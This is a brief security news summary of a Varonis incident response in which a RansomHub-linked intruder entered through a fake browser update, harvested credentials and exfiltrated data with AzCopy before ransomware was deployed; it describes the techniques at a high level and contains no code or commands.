Varonis recently helped a customer who observed a spike in CPU activity on a server, where an advanced threat actor was detected to be affiliated with the RansomHub group. The team worked closely with the customer to investigate and remediate the threat before it became ransomware.
The incident started when a user downloaded what they believed was a legitimate browser update, but it was actually a malicious JavaScript payload. This led to a chain of automated reconnaissance activities, including enumerating Active Directory users and computers, querying local system information, and hunting for credentials in memory.
To combat this, Varonis’s team wrote an unpacking routine for the specific malware variant used in the attack, allowing them to retrieve the final payload in plaintext. The final payload was a SOCKS proxy designed to facilitate communication between attacker endpoints and internal network infrastructure.
The threat actor manipulated email signatures stored at %env:APPDATA\Microsoft\Signatures, which could potentially be used on vulnerable clients to coerce an NTLM authentication attempt and result in additional credential harvesting.
After gaining privileges, the attacker began hunting for credentials and privilege escalation opportunities in the customer’s network. They scanned network shares for credential-containing material, identified credentials stored in browsers, and abused Domain Admin accounts.
The threat actor also abused registry settings and Microsoft Office utilities to open specific files of interest about the internal architecture, networking, and server environments of the client. Eventually, they deployed AzCopy, a Microsoft Azure Storage Account interaction utility, to achieve mass data exfiltration across targeted directories.
Varonis’s intervention services were able to help the customer eradicate the threat with zero business downtime. The incident highlights the need for timely detection and response to prevent ransomware attacks.
Source: https://www.bleepingcomputer.com/news/security/how-a-cpu-spike-led-to-uncovering-a-ransomhub-ransomware-attack